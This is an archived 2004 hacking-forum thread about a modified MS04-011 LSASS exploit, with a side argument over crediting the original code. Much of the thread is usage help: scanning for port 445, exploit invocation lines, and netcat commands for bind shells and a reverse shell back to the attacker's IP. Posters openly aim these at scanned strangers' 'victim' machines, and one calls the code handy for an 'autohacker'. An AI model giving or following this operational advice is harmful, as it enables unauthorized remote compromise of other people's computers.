found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more
EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing !
EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing !
heh, sounds nice
mRtWiStEr
May 8 2004, 09:20 AM
Nice Nice Love this Bug
Thanks to Microsoft and Coders of this Nice xploit ! *g*
i got no shell he says it but netcat doesnt make it ??? do you know why?
BlaStA
May 8 2004, 10:49 AM
I think the exploit failed and the port wasn't opened. Try nc -vv ***.***.***.*** 666. Then you get some verbose information.
mRtWiStEr
May 8 2004, 11:10 AM
Hi thanks for you answere...
Hmm the ips i scanned had all the port open....
Are there several Ports or just this one port to xploit the machines?
agathos
May 8 2004, 12:04 PM
well the source code looks good it isnt hard to put in a connect back but it uses the same vuln as the lsass exploit from me or HOD anyway its a good exploit
greetz agathos
s3mtexx
May 8 2004, 12:07 PM
isn't it something like this ?
first start nc -vv -L -p <PORT> then execute xp localhost <PORT>
Connecting... Error, cna't connect to victim machine
I get always this Message... do I somethink wrong?
el33t
May 8 2004, 04:14 PM
the target port 445 is blocked by fw or router.
LittleHacker
May 8 2004, 06:04 PM
Thanks Guys But It's Detected!
HotN0b0dy
May 8 2004, 07:05 PM
so which ports can I try? 666, 555, 333? all of 'em?
Killahbee
May 8 2004, 08:53 PM
yup search for servers that have those three ports wide open.....good luck m8!!
*oink*
mRtWiStEr
May 8 2004, 10:07 PM
QUOTE (HotN0b0dy @ May 8 2004, 07:05 PM)
so which ports can I try? 666, 555, 333? all of 'em?
Yeah yu can use every port for bindshell.... Just the scan port is 445!
That's it!
(Sorry for my english -> I am from Germany ^^)
andream
May 8 2004, 10:42 PM
why this exploit works 1 time on 20? is it due to the security fix?
Kynroxes
May 8 2004, 10:47 PM
yeah dude tks for the source
Masterace
May 8 2004, 11:09 PM
THX a lot!This helped me to understand why sometimes it's possible to reconnect to a target and sometimes it's not.
popo0421
May 9 2004, 12:39 AM
Good Exploit ! THX a lot! I try to exploit xp host (unpatch) is always success.
DaClueless
May 9 2004, 01:29 AM
I dont know about you, this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.
Rtyp3
May 9 2004, 01:37 AM
QUOTE (DaClueless @ May 9 2004, 01:29 AM)
I dont know about you, this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.
jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!!
woverin
May 9 2004, 03:43 AM
Thanks for sharing
woverin
May 9 2004, 04:01 AM
After i got remote shell on victim machine, how do i transfer and execute via nc? i know how to do it if both victim and me have nc but this exploit did not upload nc to the victim. Any help would be appreciated.
DaClueless
May 9 2004, 04:46 AM
QUOTE (Rtyp3 @ May 9 2004, 01:37 AM)
jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!!
I can see you have never spent hour and hours on something, that someone took and called their own.
For me, what I see is this. The original author gave us thier time and hard work in making the source code for the exploit. I feel, we owe it to them to give them credit if you use most of thier code.
toska
May 9 2004, 08:48 AM
What the hell? Is not password?!?!!? The end of the stupid fad? heh, nice work mate!
tonikgin
May 9 2004, 11:05 AM
QUOTE (DaClueless @ May 9 2004, 01:29 AM)
I dont know about you, this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.
what about shellcode? look at how many reverse shell and shell binding code are the same. should they and the basic concept behind how they work be kept locked away for nobody to see? lets lock up the linux kernel while were at it also, too many smart people that understand code are finding weak buffers in it...
i can generally see where your coming from, but your just wrong. every exploit that come out are all based on exploting one weakness, each it's own. but for every advisory, look how many exploits are released for each. it's because code can be improvised to crack something each the way the author intends.
</rant>
but yeah, author should of at least acknowledged the other releases.
tonikgin
May 9 2004, 11:20 AM
oh yeah, and on the whole 'passwording files' topic... i wanted to post an actual topic about this in the forum, but i dont feel like it.
people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password.
it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address.
and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa.
</rant>
however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you.
HotN0b0dy
May 9 2004, 02:26 PM
yeah...this is nice source indeed, but i cant get any shells. are all ppl patched or am i doing something wrong?
Bartholo
May 9 2004, 02:55 PM
Thanks for sharing!!
Very nice sploit ;-)
Anarchiste
May 9 2004, 02:57 PM
This exploit use the same bind shellcode that the HouseOfDaBus version ...so if you want a connect back shell use the houseofdabus version, it's the same...
HotN0b0dy
May 9 2004, 04:14 PM
hmm..i'd really need some help here. can anyone tell me why i cant connect to remote PC? C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
did i miss anything? wrong port? wrong command? thx
cross
May 9 2004, 04:47 PM
QUOTE (DaClueless @ May 9 2004, 04:46 AM)
I can see you have never spent hour and hours on something, that someone took and called their own.
For me, what I see is this. The original author gave us thier time and hard work in making the source code for the exploit. I feel, we owe it to them to give them credit if you use most of thier code.
If you would have read the first post on this thread, you would have seen this:
"found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more"
The keyword here is Modded, he took no credit for the original work, as for credit, just look at the source and you can see where it came from. The open source world is built on people modding other peoples work, so get used to it! This is how people learn
espey
May 9 2004, 07:29 PM
Very good tool BIG ThX 4 it
toska
May 9 2004, 10:08 PM
QUOTE (tonikgin @ May 9 2004, 11:20 AM)
oh yeah, and on the whole 'passwording files' topic... i wanted to post an actual topic about this in the forum, but i dont feel like it.
people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password.
it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address.
and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa.
</rant>
however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you.
Very well said.
bdark
May 9 2004, 11:21 PM
QUOTE (HotN0b0dy @ May 9 2004, 04:14 PM)
hmm..i'd really need some help here. can anyone tell me why i cant connect to remote PC? C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
did i miss anything? wrong port? wrong command? thx
i guess not.. i've tested it like that and it worked fine... 1st command: xp 10.0.0.0 666 Connecting...Good Getting a shell...OoOoOps shell!! 2nd command: nc 10.0.0.0 666 C:\windows\system32\
simple as that =)
try some other vulnerable boxes
DaClueless
May 10 2004, 02:24 AM
QUOTE (cross @ May 9 2004, 04:47 PM)
The keyword here is Modded, he took no credit for the original work, as for credit, just look at the source and you can see where it came from. The open source world is built on people modding other peoples work, so get used to it! This is how people learn
Yes, the open source world is built on modding other people work so we can all learn from it. But it is not built on the fact people not giving any credit to the orig author. I feel it very simple to give one line, that says code base on so-and-so code. I am, also so shock how many people feel that, there nothing wrong about using someone work, without given then any credit.
GNU license agreement /* This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */
i got no shell he says it but netcat doesnt make it ??? do you know why?
lol! i think it was better u play cards or playmobile! sorry but those questions are stupid! sorry iam not 100 % but some questions or answer are funny!
HotN0b0dy
May 10 2004, 07:34 AM
is it possible that my nc isnt workin? cuz i dont get any shells
DaRul0r
May 10 2004, 02:52 PM
I have the same Prob like HotNoob
bdark
May 10 2004, 05:06 PM
QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM)
is it possible that my nc isnt workin? cuz i dont get any shells
I don't think the problem is your netcat. It should be the way you're perfoming the comands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.
EzMe
May 10 2004, 06:01 PM
Very handy for making an autohacker
HotN0b0dy
May 10 2004, 06:34 PM
QUOTE (bdark @ May 10 2004, 05:06 PM)
QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM)
is it possible that my nc isnt workin? cuz i dont get any shells
I don't think the problem is your netcat. It should be the way you're perfoming the comands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.
it's same if i dont type -vv. -vv just tells me where's the error, if it is. And i scanned IPs before i started exploiting 'em. Are PCs maybe patched?
LKM
May 10 2004, 06:46 PM
This exploit is easy to use
first cmd.exe : nc.exe -l -p 66 second cmd.exe : xp.exe 0 vic ip 66 your ip .. .. and you'll get shell on the first cmd.exe
If it isn't working, vic is patched, filtering 445 .
Try also several time, somtimes it doesn't work, I don't know why.
LittleHacker
May 10 2004, 07:05 PM
Please someone tell me what Bug it uses ?
tonikgin
May 10 2004, 11:01 PM
^^^^^ ?
It's people like this that keep this board from it's true potential.
ms04011
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!!
...so if you want a connect back shell use the houseofdabus version, it's the same...
